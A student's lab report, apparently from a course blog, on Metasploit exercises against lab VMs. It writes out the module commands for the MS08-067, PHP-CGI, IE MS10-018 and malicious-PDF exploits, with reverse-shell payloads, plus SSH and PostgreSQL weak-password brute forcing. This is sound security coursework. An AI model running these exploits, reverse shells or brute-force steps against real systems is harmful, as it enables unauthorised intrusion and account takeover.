• 2019-2020-2 网络对抗技术 20175211 Exp6 MFS基础应用


    实践内容

    主动攻击

    ms08-067

    靶机:Windows XP

    • 首先用nmap探测是否存在漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.79.151

    • 在msf控制台中搜索对应模块search ms08-067

    • use exploit/windows/smb/ms08_067_netapi进入模块

    • show payloads显示可用的攻击载荷

    • set payload generic/shell_reverse_tcp设置攻击的载荷

    • 设置参数并发动攻击
      set LHOST 192.168.79.137
      set RHOST 192.168.79.151

    成功获取shell

    php_cgi_arg_injection(唯一)

    靶机:Metasploitable2
    靶机开放了80端口,运行着php服务,并且支持cgi模式

    • use exploit/multi/http/php_cgi_arg_injection进入模块。

    • show options查看选项,其中只有RHOST是要我们设置的

    • 发动攻击

    成功执行命令。但是这里并不是真正的shell,只是利用php执行系统命令,所以看到用户是www-data

    GPP(唯一)

    最近一场ctf比赛中的题目,也是我第一次在接近实战的环境下使用msf
    De1CTF Hard_Pentest_1

    针对浏览器的攻击

    靶机:Windows XP

    • search ms10-018查看漏洞

    • use exploit/windows/browser/ms10_10-018_ie_behaviors 进入该模块

    • info查看受影响的版本以及参数

    • 没什么要我们配置的的参数,直接exploit

      可以看到本地已经将恶意服务开放在8080端口,url为http://192.168.79.137:8080/sdVe10qkt

    • 靶机用IE访问这个url后就会执行我们的恶意代码,建立新的连接。用sessions查看建立的会话,sessions -i 1进入,成功获取shell

    针对客户端的攻击

    靶机:Windows XP

    • search adobe搜索针对adobe的攻击模块

    • use exploit/windows/fileformat/adobe_cooltype_sing 进入该模块

    • info查看信息,说明是产生一个恶意的pdf文件,当用adobe打开时就会发动攻击

    • 设置参数并生成恶意文件

      set payload windows/meterpreter/reverse_tcp
      set LHOST 192.168.79.137
      set LPORT 5211
      set FILENAME evil5211.pdf
      exploit
      

    • 开始监听,准备收shell

      use exploit/multi/handler
      set payload windows/meterpreter/reverse_tcp
      set LHOST 192.168.79.137
      set LPORT 5211
      exploit
      

    • 将生成的文件复制到靶机中,打开

      报错,没有响应

    • 但是我们已经收到shell了

    辅助模块

    靶机:Metasploitable2
    首先用nmap扫一下端口,发现开着不少服务

    ssh_login

    • 22端口开着,我们尝试一下弱口令爆破。首先search ssh type:auxiliary寻找可用的模块

    • use auxiliary/scanner/ssh/ssh_login进入模块

    • show options查看选项

    • 设置

      set RHOSTS 192.168.79.150
      set THREADS 10
      set USERPASS_FILE /usr/share/worldlists/metasploit/piata_ssh_userpass.txt
      

    • exploit开始爆破。但是我这个人不看见它动我就不放心,所以还设置了set VERBOSE true,这样可以看到每次尝试的结果。最后可以看到成功试出弱口令user:user,并且自动帮我们开了个session

    • 进入会话,成功登录

    postgres_login(唯一)

    postgres端口也开着,不如顺便试试能不能登进去数据库

    • search postgres type:auxiliary查找可用模块

    • use auxiliary/scanner/postgres/postgres_login进入模块

    • show options查看选项

    • 设置set RHOSTS 192.168.79.150就行了,别的都帮我们配好了

    • exploit

      弱口令postgres:postgres

    • psql -h 192.168.79.150 -U postgres然后输入密码,成功登录

    报告内容

    基础问题回答

    • 用自己的话解释什么是exploit,payload,encode
      • exploit:利用发现的安全漏洞或配置弱点对靶机进行攻击,将payload发送给靶机。
      • payload:植入靶机的恶意代码,通常目的是建立会话连接
      • encode:编码,可以混淆恶意代码,免杀,或者消除bad char

    实践总结与体会

    这次试验主要是利用msf这个平台针对漏洞进行攻击。msf功能确实很强大,通过这次试验,我对metasploit的结构有了更加清晰的认识,更加熟悉metasploit的操作。但是其实只是不断循环search、info、set、exploit的过程,我觉得还是没有攻防的感觉,离实战差的也是比较远。

    离实战还缺些什么技术或步骤?

    • 这次试验用的都是陈年老洞了,实战上派上用场的机会不大。尤其是如果目标是个稍微打过补丁的,软件及时更新的,就比较难办。挖0day很难,1day的话msf更新可能没这么快吧。我觉得实战还是需要跟上时代脚步,自己研究最新的漏洞
    • 信息收集是最重要的步骤其实,要是连什么服务,什么版本都不知道,就算有洞也不知道,只能瞎碰,一切都无从谈起。获取权限后,维持权限、横向渗透、消除痕迹都是很重要的步骤
    • 浏览器攻击,我们如何让靶机访问我们的页面呢?社工或者xss、ssrf?那客户端攻击,比如adobe,怎么让客户端下载并打开我们的恶意pdf呢?一次完整的攻击是多种技术的结合,没有那么理想的情况
    • 据我仅有的一点渗透经验,弱口令恐怕是最没技术含量却又最有效的攻击方式
  • 相关阅读:
    解决Win10图片打开方式没有“Windows照片查看器”问题
    20199305 2019-2020-2 《网络攻防实践》第四周作业
    20199305 2019-2020-2 《网络攻防实践》第三周作业
    20199305 2019-2020-2 《网络攻防实践》第二周作业
    20199305 2019-2020-2 《网络攻防实践》第一周作业
    20199305 《网络攻防实践》假期作业
    补交作业:第六周 SumN
    外设驱动程序设计-2
    外设驱动程序设计-1
    2019-2020-1 20199305《Linux内核原理与分析》第十二周作业
  • 原文地址:https://www.cnblogs.com/20175211lyz/p/12813891.html
Copyright © 2020-2023  润新知